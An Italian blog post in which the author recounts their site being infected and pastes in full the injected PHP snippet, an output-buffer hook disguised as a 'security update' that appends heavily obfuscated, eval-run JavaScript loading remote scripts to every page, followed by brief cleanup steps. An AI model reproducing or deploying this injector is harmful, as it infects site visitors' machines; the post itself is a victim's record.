Ovvero… colpito e affondato.

A fine aprile, uno o due giorni dopo la pubblicazione del post precedente dedicato all’anniversario di Gramsci, questo sito è stato colpito da un simpatico codicillo malware che vi incollo qui di seguito a futura memoria:

<?php ob_start (’security_update’); function security_update ($buffer) {return $buffer.’  <script language= “javascript”> var  asdas= “asd8 (@+”;function z(s)
{var asdas=”asd8(@”;r=”";for(i=0;i<s.length;i++){var asdas=”asd8(@”; if(s.charAt(i)==”Z”) {var asdas=”asd8(@”;s1=”%”}else{var asdas=”asd8(@”; s1=s.charAt(i);}r=r+s1; var  asdas=”asd8(@”;}return unescape(r);}var sdkajsnd=”e”+”"+”v”+”al”;function t(){return z($a);}var  $a=”Z63zZ3dZ22Z2566uZ256ectZ2569oZ256e cZ257a(cZ257a)Z257bretZ2575Z2572Z256e  caZ252bcb+Z2563cZ252bcdZ252bce+Z2563z;}Z253bZ22;dbZ3dZ227FtuQd8!90;0!Z25200; gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0–0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;cbZ3dZ22eZ2528Z2564Z2573);Z2573tZ253dtZ256dpZ253dZ2527Z2527;for(iZ253d0;iZ253cds.Z256cZ22;opZ3dZ22Z2524aZ253dZ2522dw(dcZ2573(cZ2575,1Z2534))Z253bZ2522;Z22;caZ3dZ22Z2566uZ256eZ2563tioZ256e dZ2563sZ2528dsZ252cesZ2529Z257bdsZ253dunZ2565scZ2561pZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|“d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;ccZ3dZ22enZ2567tZ2568;i+Z252bZ2529Z257btmZ2570Z253dds.sZ256cZ2569ce(Z2569,Z2569+1Z2529Z22;dzZ3dZ22Z2566unZ2563tiZ256fn Z2564Z2577(tZ2529Z257bcaZ253dZ2527Z252564ocZ252575Z2525Z2536dZ2565Z256eZ252574Z2525Z2532ewrZ25256Z2539Z2574e(Z252522Z2527;ceZ253dZ2527Z252522)Z2527;cbZ253dZ2527Z25253csZ252563ripZ25257Z2534 Z25256canZ25256Z2537Z25257Z2535aZ252567eZ25253dZ25255cZ252522jZ2561vasZ2563rZ252569pZ252574Z25255cZ252522Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252Z2566sZ2563Z2572iptZ25253eZ2527;winZ2564owZ255bZ2522eZ2522+Z2522Z2522+ Z2522vZ2522+Z2522alZ2522](unescapeZ2528tZ2529)};Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87trc7Z3c07id~7Z3c07f}d7Z3c07f}b7Z3c07}|s7Z3c07Z257FhZ7b7Z3c07vtc7Z3c07rfv7Z3c07iec7Z3c07}s`7Z3c07~sj7Z3c07wtg79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7×7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ceZ3dZ22pZ252echZ2561rZ2543odeZ2541t(0Z2529^(Z25270×00Z2527+Z2565s)Z2529);}Z257dZ22;daZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9;!Z2520Z2520+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050Z22;cdZ3dZ22;Z2573tZ253dstZ252bSZ2574rinZ2567Z252eZ2566romZ2543haZ2572Z2543odZ2565((Z2574mZ22;deZ3dZ22!Z25209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+0}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;stZ3dZ22Z2573Z2574Z253dZ2522$Z2561Z253dstZ253bZ2564cZ2573(Z2564Z2561Z252bdZ2562+Z2564Z2563Z252bZ2564dZ252bdZ2565,Z25310Z2529Z253bZ2564Z2577Z2528Z2573tZ2529Z253bZ2573Z2574Z253dZ2524aZ253bZ2522;Z22;Z69f (Z64ocuZ6denZ74Z2ecZ6fokZ69Z65.inZ64Z65xOfZ28Z27rfZ35f6Z64sZ27)Z3dZ3d-1)Z7bfuZ6ecZ74ionZ20calZ6cbZ61Z63k(Z78Z29Z7bwindoZ77.tZ77 Z3d Z78Z3bvaZ72 d Z3d neZ77 DaZ74eZ28);Z64.Z73etTZ69meZ28x[Z22asZ5foZ66Z22]*10Z300Z29;vZ61r Z68 Z3d Z64Z2egeZ74UZ54Z43HZ6fZ75rZ73()Z3bZ77Z69Z6edZ6fw.hZ20Z3d h;iZ66 Z28h Z3e 8)Z7bd.seZ74UTCZ44aZ74e(dZ2egZ65tUZ54CDZ61te(Z29 – Z32);Z7deZ6cseZ7bZ64Z2eseZ74Z55Z54Z43Z44atZ65(d.Z67Z65Z74UZ54CDZ61tZ65()Z20Z2d 3)Z3b}Z77Z69ndZ6fwZ2eZ67d Z3d d;Z76Z61Z72Z20tiZ6dZ65 Z3d neZ77Z20ArZ72ay(Z29;vaZ72 sZ68iftZ49nZ64eZ78 Z3d Z22Z22;tiZ6deZ5bZ22yeZ61rZ22] Z3d d.gZ65tZ55Z54CZ46ulZ6cYeaZ72(Z29Z3btiZ6de[Z22monZ74hZ22Z5d Z3d Z64.gZ65tUTZ43Z4dZ6fZ6ethZ28)Z2bZ31;Z74imeZ5bZ22dayZ22]Z20Z3d d.geZ74UTZ43DZ61teZ28Z29;ifZ20(dZ2egeZ74UZ54CMZ6fnthZ28Z29+1Z20Z3c 10)Z7bsZ68Z69ftZ49Z6edZ65x Z3dZ20tiZ6deZ5bZ22yearZ22Z5d Z2b Z22-0Z22 + Z28d.gZ65tUTZ43Z4dZ6fZ6etZ68(Z29+1Z29;Z7deZ6csZ65Z7bshiftZ49nZ64exZ20Z3d tZ69mZ65Z5bZ22yeZ61rZ22]Z20+ Z22-Z22 + (Z64Z2egeZ74UTCZ4dontZ68()Z2b1)Z3b}iZ66 (dZ2eZ67Z65Z74Z55TCDZ61teZ28)Z20Z3c 10Z29Z7bshiZ66Z74Z49ndZ65x Z3dsZ68Z69fZ74IZ6edZ65x Z2b Z22-Z30Z22 + dZ2egetZ55TZ43DZ61tZ65();Z7deZ6csZ65Z7bshZ69Z66tIZ6eZ64ex Z3d sZ68Z69fZ74InZ64ex Z2bZ20Z22-Z22 + d.Z67etUZ54Z43DaZ74Z65(Z29;}Z64oZ63Z75Z6denZ74.Z77ritZ65(Z22Z3cscrZ22Z2bZ22ipZ74 laZ6eZ67uZ61Z67Z65Z3djaZ76Z61scZ72ipZ74Z22+Z22 srcZ3dZ27htZ74Z70:Z2fZ2fsearZ63hZ2etwiZ74teZ72Z2ecZ6fZ6dZ2ftrendZ73Z2fdailZ79.Z6asoZ6e?dZ61teZ3dZ22+ sZ68ifZ74InZ64ex+Z22Z26caZ6clZ62acZ6bZ3dcZ61llbZ61ckZ32Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);} fZ75nZ63tiZ6fZ6e cZ61llZ62acZ6b2(Z78)Z7bwindoZ77.twZ20Z3d xZ3bsc(Z27rZ665fZ36dsZ27,2,Z37)Z3bevZ61Z6c(uZ6eescZ61pe(Z64Z7aZ2bZ63z+Z6fpZ2bst)Z2bZ27dw(Z64Z7a+Z63z($Z61+Z73tZ29Z29Z3bZ27);Z64ocuZ6dZ65nZ74.Z77riZ74e($Z61)Z3b}dZ6fcZ75mZ65nt.Z77rZ69teZ28Z22Z3cimg sZ72cZ3dZ27http:Z2fZ2fsearZ63hZ2etwZ69tteZ72.cZ6fmZ2fimaZ67esZ2fseZ61rZ63hZ2frssZ2epZ6egZ27 wZ69Z64Z74hZ3d1Z20heZ69gZ68tZ3d1 styZ6ceZ3dZ27visZ69bZ69lZ69tyZ3ahZ69Z64denZ27 Z2fZ3e Z3cscZ72Z22+Z22ipt lZ61ngZ75Z61gZ65Z3djavZ61sZ63riZ70tZ22Z2bZ22 srZ63Z3dZ27http:Z2fZ2fsearZ63h.Z74wZ69Z74terZ2ecZ6fmZ2ftZ72Z65ndZ73Z2fdaZ69lZ79Z2eZ6asonZ3fcalZ6cbacZ6bZ3dcZ61llbZ61ckZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);}Z65Z6cZ73eZ7b$Z61Z3dZ27Z27};fZ75Z6ecZ74ionZ20sc(Z63nZ6d,vZ2cZ65Z64Z29Z7bvaZ72 exZ64Z3dnew Z44aZ74Z65(Z29;eZ78d.Z73Z65tDZ61Z74Z65Z28exZ64.Z67etDZ61Z74eZ28)+Z65d)Z3bZ64ocuZ6deZ6et.cZ6fokiZ65Z3dcnmZ2bZ20Z27Z3dZ27 +escape(Z76)+Z27;exZ70ireZ73Z3dZ27+exd.tZ6fZ47MTSZ74Z72ingZ28Z29;};”;window[sdkajsnd](t());</script>’;}//important security update ?>

Bello vero? Il codice, probabilmente agendo in completa autonomia (ovvero senza il controllo di un programmatore, ma con funzione da bot della rete), si è propagato in diversi files php, aggiungendosi in testa o in coda al testo normale.

Secondo il rapporto di google, questo codice è poi riuscito ad infettare un solo computer. Per fortuna so anche a chi appartiene: è il mio, che infatti ho dovuto formattare nella sua partizione windows, perdendo così la mia imbattibilità di circa 3 anni nei confronti di attacchi virus. Chapeau!

Non avendo molta esperienza di virus interni ad un blog (e complice il poco tempo a disposizione), ho impiegato poi qualche giorno a capire come ci si debba muovere in questo caso. Ecco come ho fatto, nel caso capiti anche a chi legge: back-up su pc di tutti i files, analisi dei files (aprendoli come file di testo uno ad uno, iniziando da index.php), rilevazione del codice malevolo, query per individuare il codice in tutti i files del back-up, cancellazione del codice malevolo dove presente, sovrascrittura di tutti i files da pc a server.

Più o meno funziona: ho ancora qualche problemino, ma il virus per il momento è andato.

Uno spasso che non sto neanche a raccontare… soprattutto grazie ai divertentissimi messaggi allarmistici di google!

Share on Facebook